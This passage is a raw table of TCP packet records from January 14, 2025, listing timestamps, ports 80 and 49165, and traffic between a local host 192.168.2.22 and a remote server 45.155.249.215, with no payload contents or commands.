Jan 14, 2025 16:21:08.776070118 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.776077986 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.776112080 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.776124954 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.776148081 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.776148081 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.776165962 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.776216030 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.776475906 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.776527882 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.776540041 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.776551962 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.776566982 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.776570082 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.776664019 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.776842117 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.776860952 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.776874065 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.776895046 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.776895046 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.776937962 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.777044058 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.777056932 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.777091026 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.777301073 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.777340889 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.777363062 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.777378082 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.777432919 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.777442932 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.777453899 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.777477026 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.777491093 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.777491093 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.777518034 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.777549028 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.777560949 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.777571917 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.777590990 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.777627945 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.778258085 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.778276920 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.778287888 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.778321981 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.778341055 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.778341055 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.778361082 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.994436026 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.995336056 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.422410011 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.422593117 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.479973078 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.484987020 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485013008 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485025883 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485034943 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.485038042 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485050917 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485057116 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.485061884 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485073090 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.485074997 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485090971 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.485105991 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.485160112 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485172033 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485183001 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485194921 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485203028 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.485224009 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.485245943 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.485330105 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.485414982 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485429049 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485440016 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485464096 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.485483885 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.485515118 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485527039 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485538006 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485549927 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485557079 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.485570908 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.485598087 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.485691071 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485702991 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485713959 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485726118 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.485743999 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.485755920 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.486313105 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.486332893 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.486344099 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.486358881 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.486382008 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.486382008 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.486428976 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.486474037 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.486722946 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.486735106 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.486746073 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.486767054 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.486777067 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.486802101 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.486814022 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.486824989 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.486836910 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.486840963 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.486855030 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.486874104 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.487010002 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.487021923 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.487032890 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.487044096 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.487054110 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.487078905 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.487596989 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.487715006 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.487751961 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.487763882 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.487776041 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.487783909 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.487786055 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.487797976 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.487802982 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.487823009 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.487843037 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.487898111 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.487910032 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.487920046 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.487931967 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.487938881 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.487942934 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.487960100 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.487982035 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.488004923 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.488540888 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.488588095 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.488598108 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.488610029 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.488641024 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.488641024 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.488662004 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.488702059 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.489888906 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.489936113 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.489968061 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.489979982 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.489991903 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.490003109 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.490020990 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.490348101 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.490391970 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.490405083 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.490416050 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.490438938 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.490448952 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.490480900 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.490493059 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.490504026 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.490516901 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.490535975 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.490542889 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.490669012 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.490679979 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.490690947 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.490701914 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.490715981 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.490716934 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.490735054 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.490735054 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.490799904 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.491256952 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.491269112 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.491280079 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.491302013 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.491326094 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.491395950 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.491408110 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.491419077 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.491430998 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.491439104 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.491462946 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.491462946 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.491527081 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.491538048 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.491544008 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.491554022 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.491585970 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.491740942 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.491936922 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.491986036 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.492588997 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.492609024 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.492620945 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.492628098 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.492640972 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.492659092 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.492708921 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.492743969 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.492750883 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.492763042 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.492790937 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.492801905 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.492877960 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.492888927 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.492899895 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.492911100 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.492918968 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.492949963 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.493014097 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.493025064 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.493046999 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.493060112 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.493060112 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.493072987 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.493097067 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.493112087 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.493412018 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.493455887 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.493478060 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.493489027 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.493518114 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.493535042 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.493545055 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.493556976 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.493573904 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.493586063 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.493701935 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.493760109 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.493772030 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.493782043 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.493793011 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.493804932 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.493804932 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.493815899 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.493818045 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.493834019 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.493848085 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.493872881 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.495177984 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.495228052 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.495228052 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.495240927 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.495268106 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.495280027 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.495296001 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.495306969 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.495335102 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.495362997 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.495383978 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.495407104 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.495419025 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.496392965 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.496404886 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.496416092 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.496437073 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.496448040 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.496485949 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.496496916 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.496506929 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.496517897 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.496525049 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.496541977 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.496562004 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.496618032 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.496629000 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.496639967 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.496659040 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.496675968 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.496776104 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.496788979 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.496798992 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.496810913 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.496819973 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.496824980 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.496831894 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.496843100 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.496850967 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.496853113 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.496865034 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.496901989 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.496913910 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.497011900 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.497024059 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.497060061 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.497140884 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.497478962 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.497526884 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.497543097 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.497555017 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.497586012 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.497601986 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.497617960 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.497631073 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.497643948 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.497652054 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.497668982 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.497729063 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.497740984 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.497751951 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.497764111 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.497770071 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.497783899 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.497802973 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.497842073 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.497884035 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.498011112 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.498022079 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.498033047 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.498044014 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.498054028 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.498054981 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.498065948 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.498070002 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.498080015 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.498090029 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.498094082 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.498100996 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.498111963 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.498116016 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.498121977 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.498142004 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.498291969 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.498303890 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.498317003 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.498327971 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.498336077 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.498347998 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.498363018 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.498502970 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.498514891 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.498526096 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.498537064 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.498547077 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.498548031 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.498559952 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.498567104 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.498590946 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.498600960 CET	49165	80	192.168.2.22	45.155.249.215
